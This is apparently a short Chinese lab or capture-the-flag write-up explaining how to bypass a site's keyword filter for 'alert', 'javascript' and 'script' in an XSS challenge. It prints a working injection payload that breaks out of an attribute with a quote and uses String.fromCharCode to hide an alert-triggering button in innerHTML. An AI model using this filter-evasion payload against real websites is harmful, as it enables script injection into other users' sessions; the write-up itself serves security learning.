本文介绍了一种绕过网站过滤机制实现XSS攻击的方法。通过使用String.fromCharCode函数将恶意脚本转换为字符代码,成功绕过了alert及javascript等关键字的过滤。
这一题过虑掉了alert这个函数,以及javascript,script等关键字。这就好办了,首先想到使用String.fromCharCode这个函数
经过对网页代码分析,注入的内容如下:
把脚本 <input type="button" onclick="alert(HackingLab)" value="click me" /> 进行toCharCode转换
s=guest' onclick='document.getElementById("msg").innerHTML=String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,98,117,116,116,111,110,34,32,111,110,99,108,105,99,107,61,34,97,108,101,114,116,40,72,97,99,107,105,110,103,76,97,98,41,34,32,118,97,108,117,101,61,34,99,108,105,99,107,32,109,101,34,32,47,62)
提交查询,然后点击第二个输入框
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
